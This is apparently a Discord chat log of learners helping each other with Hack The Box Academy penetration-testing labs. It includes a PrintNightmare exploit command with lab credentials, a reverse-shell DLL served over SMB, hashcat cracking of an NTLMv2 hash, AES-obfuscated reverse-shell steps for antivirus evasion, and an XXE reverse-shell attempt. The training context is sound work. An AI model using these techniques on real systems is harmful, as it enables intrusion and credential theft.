your error is a timeout error meaning it's timing out before it connects

btw what's up with the new pwnbox image? lost of broken stuff espically python, and python 2 is not even in the apt repo

i don't work here blame @indigo rock ¯_(ツ)_/¯

I'm having trouble with the third problem in this section: https://academy.hackthebox.com/module/39/section/415. I have a meterpreter shell on the target machine, and I've tried to use linux/local/sudo_baron_samedit (privelege escalation to sudo). But the baron exploit requires x64, the first exploit to get on the system (exploits elfinder) supports x86 and x64, but it only works with x86, saying this if I try to use x64:

[-] Did not receive a response from elFinder
[-] Exploit aborted due to failure: unexpected-reply: Upload was not successful

This makes a conflict so that I cannot use the x64 baron sudo exploit. What am I doing wrong?

don't worry about the dependency

just follow the steps

get initial session --> ctrl+z --> switch to privesc exploit --> bind it to the session

same but idk at this point

goodbye

do I do that just by setting the SESSION option?

yes

set session N where N is the session that your reverse shell is in

if you're unsure just type sessions to get the number

I did that

and it exploits, but doesn't spawn a session

another one

I also make sure to set LPORT to something different

make sure the LHOST is your tun0

thank you. I thought I set it properly, but it must've reset when I accidentally restarted msfconsole. not sure how that happened

LHOST is my new enemy 🤬

it defaults to the eth0/enp0s address

same problem as last time I asked for help

has anyone else had trouble staying connected to their academy labs lately? for the past few days the connection has been super spotty

https://www.offsec.com/metasploit-unleashed/msfconsole-commands/#setg

use tcp vpn; change vpn regions

i've tried switching regions a few times but i don't remember if i've ever tried using tcp

maybe this will help https://gist.github.com/Xre0uS/2105986d23719cf99c271842528f48a6

but if the problem is their own internal network then

thank you

This floor is made of floor

but yeah it's funny, but some people do need it spelled out

i feel like if you need it spelled out that Network File System is a network file system then you might not be cut out for cpts

USING WEB PROXIES > Burp Intruder > Question 1
https://academy.hackthebox.com/module/110/section/1054

I'm getting errors when fuzzing for HTML files. I think it might be because I'm connected to the webpage over HTTPS instead of HTTP. But I could not connect to the webpage over HTTP.

https isn't running on those servers afaik

you'll get a 4xx error on all the ones that don't contain the answer

https://academy.hackthebox.com/module/113/section/1210

need help, the joomla_dir_trav.py script runs from python2.7. when i run the command as demonstrated it says its missing click. so i do sudo pip install click and it says it already exist in /usr/lib/python3/dis-packages (8.1.7) i cant run it with python3 i get a seperate error

i just read... theres py3 ver of the script

Weird, the webpage doesn't render any content over HTTP. I can only connect over HTTPS.

well because you need to find the <x>.html file

it's not loading bc no index.html :)

or default .html page that it's loading

Oh okay that makes sense.

if all else fails, reset the target

I'll give it another try.

but https will always fail as there's no SSL services running

Ok it's working now. Thank you.

At first I couldn't capture an HTTP request over Burp because I was trying to load a non-existent page. After I loaded a page that exists I was able to intercept the HTTP request.

👍

it's generally asking you to visit the base page

http://ip:port

then perform the attack described from that

Yeah but when I went to http://ip:port I didn't capture any request in Burp Suite, because the page did not exist.

Hey @shut quest, I'm working on INTRODUCTION TO WINDOWS EVASION TECHNIQUES - Dynamic Analysis - Option 2 with microShell. In the example given, it looks like they ran the program from Administrator Powershell. In the Introduction chapter, we are given a target VM that provides us with Administrator privleges, but not in the chapter I am in Dynamic Analysis. Do I use the Introduction VM given, or the one in Dynamic?

ah

Should still work without admin

it loaded, just didn't load what you expected

if it didn't load/connect there'd be an error message in the browser

If anything the author was showing it work on the dev machine (cooking atm so I can verify)

@shut quest Gotcha, so I just drop it into the C:\alpha\dynamic folder and it will be ran.

Correct

Okay then it must be something with my code or something else. Thank you

Originally I wasn't capturing any request in Burp Suite at the base URL but now I'm able to. I probably just had to reset my target. All good now.

@shut quest Here are the steps I did for option 2. (I did get option 3 working, and wrote my own reverse shell, but using micr0shell is harder for me)

1. Take the NotMalware code from Static Chapter
2. Generate a shell with IP and Port of attack VM
3. Take the hex and convert it to a AES-base64 string
4. Put this string in place of the meterpreter AES-base64 string
5. (Optional) Add the iv and key for the aes decryption (though these appear to be unchanged from CyberChef)
6. set netcat on attacker VM and listen on 8080.
7. compile, transfer to victim, insert into C:\alpha\dynamic. Verify it runs via log.txt
8. Wait for connection from victim.

Did I miss a step? I might just burn it all down and try again tomorrow if everything looks right.

is there someone who can help me read through the report in the documenting and reporting section its difficult to know where to start and what to take screenshots and notes on. its all over the place. i was able to get into the dc01 host but i failed to document as i went. but everything was still up so i could capture it

would be awesome if someone could wlak me through so i can get a different point of view on learning this portion

I’m in the information gathering-web edition skill assessment, and the problem I’m running into is when I run any of my tools dig, dnslookup, Whois, I get either no results or unable to find server. I added the ip and web page to my host file and am able to find the web page in the browser but none of my other tools are pulling any results.

Did they give any specific websites for you to collect info on?

Yea vHost inlanefreight.htb I added that and the ip to my hosts file

it's not a public domain, so you won't find it with nslookup or whois

Use ".com" instead of .htb

Inlanefreight.com

also don't include the port number in your host file

^

You need to add the IP (without port) and Domain to your hosts file.

Then why in the instructions do they say to use them

Try running whois on "inlanefreight.com"

Sorry just not making any sense on why they say to use those then not make it to where you can

the hosts file is only responsible for name resolution. This has nothing to do with the port

look at the first question carefully

Changed the host file with out the port still no results

That's because inlanefreight.htb is not a real domain

htb is not an official top level domain

I’ve answered all but the last question and I did it from my personal machine I’m using the attack box cause not at home

I did .com instead of htb

After modifying the host file without the port

What question exactly are you trying to answer?

The final one what is the API key the inlanfreight.htb developers will be changing too?

You have found a subdomain. From there, apply all the techniques shown in the module again. Then you will also find what you are looking for

if you can't find something on one subdomain, perhaps dig deeper

https://tenor.com/view/inception-deeper-go-deeper-we-need-to-go-deeper-leonardo-di-caprio-gif-16756828

The new information gathering module is really well done. Forces you to think outside the box a bit

ReconSpider comes in clutch

had that working for .com but not .htb past q3 in skill assessment 😦

"if you can't find something on one subdomain, perhaps dig deeper"

What have you tried?

make sure to remove line breaks, 5 is not optional as you need that to decrypt, 6 is whatever port you stated so if 8080 cool, else modify. did you clean up the xor?

read what I said previously; if you can't find on one -- dig deeper

I went deeper and got it done

👍

but also ReconSpider won't work on the first subdomain

it's not set up in that way

So I haven’t answered the final question and it gave me 19/19 on the course

well if you can't click on "finish" at the end of the module, then it's not complete

and it won't count as completed

It just shows view instead of continue

Does anyone have the silver annual ? I was going to purchase to assist with the CPTS and was wondering if it was worth it?

only if you find yourself getting heavily stuck and don't wanna reach out for help in the discord

¯_(ツ)_/¯

the walkthroughs mostly assume you read the content or have underlying knowledge of a concept that's required for the module

I was trying to finish as quickly as possible without bugging everyone lol.

finishing quickly should not be the goal

So only the annual provides the step by step solutions, not the monthly.....

you should have learned and understood all the techniques and tools used throughout the entire course

yes

you can't copy/paste your way to the CPTS certification

Ok....I'm going to ho ahead and get it.

imo

if you're trying to speedrun the cert path, you're gonna fail the exam

I know I can't.

you should focus on where you got stuck and understanding what you misunderstood/needed to add to get unstuck

Have you passed it?

getting stuck is natural, but if your immediate reaction to getting stuck is "what's the answer" then you're just setting yourself up for failure

if you rely on using that feature to do modules it won't help with your learning

Right

you need to be able to think critically

I genuinely only use the guides for one of two things; 1) if i've already asked and I just didn't get anywhere with the hints and 2) to see if the guide does something different than me

it's all in how you actually use the tool

but it's absolutely not necessary ¯_(ツ)_/¯

plenty of people passed without the guides being a thing at all

Ok. Thanks for the insight.

(except for enterprise)

so if you truly feel you need a guide to move forward, take a step back and slow down your reading

and also TAKE NOTES

taking notes is THE most important thing

you're not expected to memorize every little syntax

just understanding what tool you need is more than enough

the rest can be googled or saved as a shortcut for later

I did.

I have been stuck in the login ssh brute force question on the module.

The only reason I wanted the silver annual was because I wanted to make sure I understand EACH section completely

you get better answers in here with

• Module name - Section Name
• What question
• what you're stuck on/what you've tried

the walkthroughs don't explain anything, at all

they are based off the assumption you read the content

Is anyone available for help on the the Active Directory Trust Attacks module abusing ADCS? I'm confused on what I'm supposed to do and may be messing up the attack chain.

you'll need to understand the previous section first. but basically just create a vulnerable template, push it to the parent domain then request it

All from DC02 right?

from the cild domain yes

follow the steps in the module

So no where in the attack chain do you need access to DCO1? I've been following the steps, but I keep getting an error about the default policy module blocking the cert. Is like it doesn't sync after it's added to active enrollment.

Can I DM you to share a screenshot if the error I'm getting? @next bronze

request the cert from dc01 after it's been published, you can just send the screenshot here

Nevermind, figured it out. I either forgot to hit apply somewhere or it just needed time to sync.

seems like you didn't configure the template right

check the permissions and rights

@next bronze you here?

I keep having an issue with multidump

it says "The magic bytes are not zero! Probably wrong file/key used, or data lost during transfer." and I dont know how to debug it

if the data is transferred over a proxy you'll need to give the handler the proxy's ip

but this is not the right channel, use #red-team or something

@fathom pendant you guys got msgs delete perms in this channel?

https://tenor.com/view/mc-gregor-conor-ufc-boxing-gif-21215303

it's to be able to circumvent slow mode

"It's TheCyberSimon the Lord of skids"

bc of how discord perms work

my bad, thanks

Attacking Common Services -> SQL.

"What is the password for the "mssqlsvc" user?"

How can I possibly crack this hash or use it?

It looks like an NTLM hash

yep

it's an NTLMv2 hash

and hashcat can certainly crack it

I mean should be NTLM but I cant see it

wdym?

i can see it right there

Is it the FC.....78 part?

the whole thing from mssqlsvc all the way to the end is the hash

https://hashcat.net/wiki/doku.php?id=example_hashes

search for NTLMv2

:)

Ah okay, I thought of using online rainbow tables to crack it but maybe that won't be possible since its NTLMv2? :-)

hashcat -m 5600 -a 0 -o cracked.txt ntlmv2_hash.txt /path/to/wordlist.txt

the module should give you a wordlist

if not; rockyou

Yup, but NTLMv2 is not possible to use crackstation etc?

Crackstation does support NTLM

it does... but that's not what the module wants you to do

read the section

you're meant to use tools

as crackstation only uses popular/known words

You can use hashcat, the password is most likely in rockyou.txt

if it's not in their list guess what, crackstation won't find it

then what will you do?

Gotta apply braincells to problems my boi

Thanks for the help both

Hi, I am doing
Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: Bleeding Edge Vulnerabilities

I am trying to do the steps shown on "PrintNightmare" vulnerability. So far, I have

1. Verified that the server is vulnerable
2. Generated a reverse shell DLL payload
3. Started a smbserver

sudo smbserver.py -smb2support Payload "/home/htb-student/backupscript.dll"

4. Started a listener using metasploit

The problem is with the SMB server. When I run the exploit, I get the error

└──╼ $sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@172.16.5.5 '\\172.16.5.225\PAYLOAD\backupscript.dll'
python3: can't open file '/home/htb-student/CVE-2021-1675.py': [Errno 2] No such file or directory

But the backupscript.dll file exists:

┌─[htb-student@ea-attack01]─[/opt/CVE-2021-1675]
└──╼ $ls -l /home/htb-student/backupscript.dll
-rw-r--r-- 1 htb-student htb-student 8704 Jul 11 02:23 /home/htb-student/backupscript.dll
┌─[htb-student@ea-attack01]─[/opt/CVE-2021-1675]
└──╼ $ls -ald /home/htb-student/
drwxr-xr-x 1 htb-student htb-student 558 Jul 11 02:23 /home/htb-student/

When trying to execute ls command with smbclient as well, I get NO_SUCH_FILE error:

┌─[✗]─[htb-student@ea-attack01]─[~]
└──╼ $smbclient -N //172.16.5.225/Payload
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \*

Can anyone point out what I am doing wrong during SMB server set up step?

Try just the path for the share instead of the file

(gdb) run $(python -c "print '\x55' * 1200") is there another command in gef or gdb for this? I can't get it to overwrite the eip and ebp?

I've tried to get python 2 with pyenv but it needed a package I searched forever to find and I can't get it installed. openSSL-dev1.0 needed for python 2.

This is for the linux buffer overflow module in the academy.

Thanks, it worked!

Good morning to all. I have a question regarding reverse shells in python. When you do sudo python3 -m http.server 80 to create a shell it is inidcated thatit is listening on the ip 0.0.0.0. Is this the IP I have to include or is it the IP of my box (this time is the VPN IP as we are on a VPN).?

thats not a shell. thats you creating a HTTP server on the machine you typed that in

Correct

sudo python3 -m http.server does not create a reverse shell. That's just a python server

I am injection a php one line reverse shell to get the response there

agreed my mistake

if you are downloading a file from your new http server, you need to use the IP of the box. the 0's is just a local host IP not your IP on the network

using 'ifconfig' or 'ip a' to find your IP is bset

it'll be 10.10.xx.xx most likely, under the tun0 interface

0.0.0.0 means the machine is serving on all interfaces

yes indeed

(tun0 is tunnel interface 0, the VPN for the connection via your VM)

Ok nice to know that

OK got it. Thank you guys for your prompt response.

Are you trying to serve a reverse shell on your computer for a specific target?

yes. I am trying to inject a XEE vulnerability with curl to download my xee.php one liner to get a reverse shell. But I can't make it work.

Shouldn't I be able to just login with the svc account after cracking the pw? Tried multiple times

Oh okay. So in that case yes you should run a http server on your end. On your one liner payload, you have to enter your tun0 IP:port

Did that but still dont get an answer back. hahahah Maybe is not vulnerable with the expect entitty?

Unless you start the HTTP in / you might want to change the path in you payload.

Hi ! I'm working on the "INTRO TO WHITEBOX PENTESTING" module - section Skills Assessment.
I've found one of the RCE method but looking for the second one.
Does anyone can nudge me?

Yeah

will put it on the /

Did you test for vulnerability?

yes it is vulnerable

i could get the etc/passwd

uh php payload need php server?

Yup then it should work

going back. will let you know how it goes amigooos :D

Did you crack the password?

I moved the file to / . then I tried the curl command normally in terminal and the file was downloaded and saw the result in the Python webserver. When doing this I get no response though. Could it be the ' ' needs to be encoded?

Are you listening for the rev shell?

yes

you try using sqsh?

Curl command done outside the BURP request and we can see results in the web server waiting on the other side.

No I found it awful, but since it works with the provided account I believe it should work with the service account too - wdyt?

Yes

Try logging in with sqsh